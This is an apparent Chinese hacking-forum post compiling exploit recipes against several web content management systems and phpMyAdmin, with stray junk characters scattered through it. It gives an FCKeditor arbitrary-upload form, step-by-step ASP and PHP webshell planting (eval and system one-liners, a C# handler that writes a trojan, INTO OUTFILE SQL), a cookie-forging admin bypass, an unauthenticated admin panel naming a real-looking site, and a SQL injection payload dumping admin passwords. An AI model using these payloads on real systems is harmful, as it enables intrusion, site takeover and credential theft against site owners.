$ K [2 ?% u0 U
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
5 N% y2 _" ` o! j跳转到网站根目录上传任意文件。! A a" x- D/ S6 n. k5 b6 Z
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
: n8 H* B+ v( [; K* S' y<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
, X( J3 O6 W2 t( x# f" `Upload a new file:<br>+ ^# F3 U. E* |
<input type="file" name="NewFile" size="50"><br>1 C+ C+ e. u) ]5 A
<input id="btnUpload" type="submit" value="Upload">/ I- ]8 v# P; V2 F* n4 a! [
</form>) q- V3 d8 `' g7 ~8 H
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ I5 t' ^# R$ t/ S
* Z- S; \% j* z
SDcms 后台拿webshell: A! p5 C& f2 {; C& d
0 _( V7 i G0 M) v) |/ m4 p w9 W第一种方法:. M, H3 s2 ]8 P3 H/ p
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
& K/ j. Z1 f7 H2 N8 x" A把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
2 i0 _1 u+ J1 ]& j( {' Q: J/ ^用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
! U# B/ N9 w; U; a5 A; Q+ u9 A第二种方法:
9 s2 W- b4 E7 Q, N6 k; e; @进入后台-->系统管理-->系统设置-->系统设置->上传设置;
! j, f/ p0 `1 S/ A" I5 u1 M& M2 R在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
6 M( F, v6 l7 v+ A7 Y& |第三种方法:+ u: J, C) U1 m
进入后台-->界面管理-->模板文件管理-->创建文件
# c! \1 K. {8 K* k: Y. n7 {文件名写入getshell.ashx x+ J1 @% ?2 J
内容写入下面内容:
5 H0 O5 o2 Q0 Q% H% k/====================复制下面的=========================/0 o9 z8 Y% n% e; \8 _
<%@ WebHandler Language="C#" Class="Handler" %>: @8 ^- l9 o U9 b. N+ H% D
using System;
2 o7 O m0 W: w! V6 G0 [using System.Web;
4 R" Y4 U" t$ a- V1 Q3 d4 Yusing System.IO;# c! |1 X j9 j1 ?4 e* Y8 g( z
public class Handler : IHttpHandler {: [) N0 B8 Q6 X
public void ProcessRequest (HttpContext context) {- X5 e. p6 g% ~
context.Response.ContentType = "text/plain";9 E+ y; N, h1 G% O
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));* l2 f, O P( d% V
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
0 ^+ b: V, L2 b5 v- lfile1.Flush();
2 Z& d9 c* n0 g' J3 Q9 w8 Tfile1.Close();
0 U: {3 \+ ?, V& M}
) M1 \6 L3 U" Upublic bool IsReusable {: ]$ V% v! p4 w4 o5 x! s3 d
get {
) ~: F& [' h0 U3 B9 r0 Q/ jreturn false;
4 h( `# D; I4 n, Q+ \- r7 e, O}
' `( s9 [+ {1 W U" H' Q8 p}
3 W7 K+ x9 e, e e+ M* _+ Y}! H1 k. T- v" E c
/=============================================/
6 U7 X6 S( }1 T" ^: I7 Z8 ]访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx6 G4 ?$ X4 ~# @# Y
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接7 j5 x' J' P6 d' r3 I1 ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ G% r+ p& K& q& F. g# u2 O. a; W
( P4 y2 R7 _- S( W- S# i
ESCMS网站管理系统0day$ [$ b2 @: o/ Q3 C/ @5 D% K
- F. l' r n2 g, I9 E
后台登陆验证是通过admin/check.asp实现的9 g- y" Y; X; c; o3 d
w% n$ _' Y1 P) |: d/ u' t
首先我们打开http://target.com/admin/es_index.html
, _/ X; `: L+ d然后在COOKIE结尾加上) ~7 r) Q8 _/ d# u9 ^- u
; ESCMS$_SP2=ES_admin=st0p;# G y$ p8 g% A P: o8 C4 q
修改,然后刷新
8 y( K4 ]& m, ]8 G$ J: A, y* \( |进后台了嘎..
" B5 V% G0 Y+ C' g, ~7 v) w然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
0 ~& e/ x& l, K0 ?9 c+ t
8 Y T7 H: t, h, W利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% l/ b# S7 I$ v" Y% K N2 z6 e( e3 f1 |嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp" ?$ c3 o: S% T9 o* x( f2 u
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..+ D8 e, _! ]5 ]: a Q5 Y2 [
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
. T2 | g9 B6 m3 C------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ M* Q- f- l: U; _
2 U1 E7 x% P1 D+ u% b
宁志网站管理系统后台无验证漏洞及修复; `4 b' f6 H# J B3 v
* E! M& \3 u; [网上搜了一下,好像没有发布.如有雷同纯粹巧合!6 x+ \, l" Y. o5 K2 r) d( `% [
官方网站:www.ningzhi.net
. O7 L' _: ^! ~$ u$ M学校网站管理系统 V.2011版本
7 P9 E# R- f% Xhttp://down.chinaz.com/soft/29943.htm
+ J* e l( y6 }4 T+ E. q2 e' B其它版本(如:政府版等),自行下载.
0 X7 x1 M$ H! u+ _0 }2 a漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~# ~7 R4 w$ I# |4 \, x% Y2 @5 G
login.asp代码如下:
% Q- _6 e0 a/ h: _1 q<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> . l' ?, B( N8 ?% V' q& L! f% m4 d/ L
manage.asp代码我就不帖出来了.反正也没验证.
# U3 h% u8 z( P0 l& G只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
" _1 s) P/ G, W. o1 d8 c% h漏洞利用:
3 U1 W9 _) \$ \/ G. i直接访问http://www.0855.tv/admin/manage.asp
2 f* _4 K( R7 ^5 {& O数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
t; w5 m0 k$ R$ F4 V----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ H& V' ^9 O# q( \
0 j9 @# _: ~8 Cphpmyadmin拿shell的四种方法总结及修复 F, y1 u7 R: r" `! z3 F
; H5 v8 y! c `- Q- }+ T0 h* }
方法一:
3 i/ ]6 a% \/ K4 xCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );) q% Y- l2 f4 [0 t, b
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
* ~) C, q4 r- ]5 R8 l6 t& gSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';9 H' i; B7 j& @7 A4 G
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
6 N0 a% V( a0 d2 ^, E, ~& k 一句话连接密码:7on# l5 X: f% p8 [* j! Z$ A3 @3 _9 `
方法二:
8 b3 C9 Y4 V: a, E6 D' p7 k6 U8 @8 D读取文件内容: select load_file('E:/xamp/www/s.php');
3 A- P/ r% O) G3 f写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
! V6 }+ ?4 }, P w+ s3 dcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
' d$ e* |6 L' R& [3 q: T方法三:
/ c7 F$ c5 E/ c( L; NJhackJ版本 PHPmyadmin拿shell' Y" |1 b5 W0 V" R) ~3 a( Z
Create TABLE study (cmd text NOT NULL);! g y4 I( B3 h2 I# G. G
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');! w1 _& C8 ^( w# B9 E: w
select cmd from study into outfile 'E:/wamp/www/7.php';
$ ^- k0 f. j. _" H G% pDrop TABLE IF EXISTS study; j, P7 e4 V$ r" t: o
<?php eval($_POST[cmd])?>0 ~5 F: l6 J `% r+ }! y
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
- `" f5 x1 N [1 CINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
* w. L& e5 [! Q# A, Q& gSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1& w4 y& i. ], f0 [4 T
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
( z7 x, ? G+ {7 p5 u4 I0 h方法四:
k9 M/ s# n9 L" q% R& Eselect load_file('E:/xamp/www/study.php');
f* Y! Y) u, P% dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'7 W* W2 m3 v/ s6 g3 _* |
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir1 y: E* D" N/ G+ q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
; a* o v% N* O1 m5 l; N# F
2 ^' r+ a( v2 f- ?" t/ fNO.001中学网站管理系统 Build 110628 注入漏洞
6 M6 D1 E! p0 O+ W' b, L2 V# [' Y! ^. Z( s+ T& `- i8 c
NO.001中学网站管理系统功能模块:8 S$ Q( g Q$ }4 D: g; S) l
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等* P* u# X/ h% t8 ^
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
, K. r3 C# D$ s1 a% S1 J2 S3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
- k! U% A3 Y2 `4.视频图片管理:一级分类,动态添加视频或者图片等信息
1 t" r6 U; j1 B9 X( \# C5.留言管理:对留言,修改,删除、回复等管理 }: A9 [4 ?& m* V1 z. x' p7 `
6.校友频道:包括校友资料excel导出、管理等功能
& ?* i4 V2 q6 p% i" u7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
' _ X* `8 P3 w8 @1 g b默认后台:admin/login.asp0 x i* U9 T+ u6 u
官方演示:http://demo.001cms.net
! y- Y" }* P5 M8 X; m, K源码下载地址:http://down.chinaz.com/soft/30187.htm
! B$ Z' m. v+ MEXP:
+ U! d6 S3 Y" H5 j8 \ `1 dunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
$ s+ p( q( P7 E; Z+ a/ l测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin5 {( i8 T% S) F) K `( c
getshell:后台有备份,你懂的& _5 y. c) d) { W: F/ [6 K2 P
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
# @2 _: B" S% i' {8 Z------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对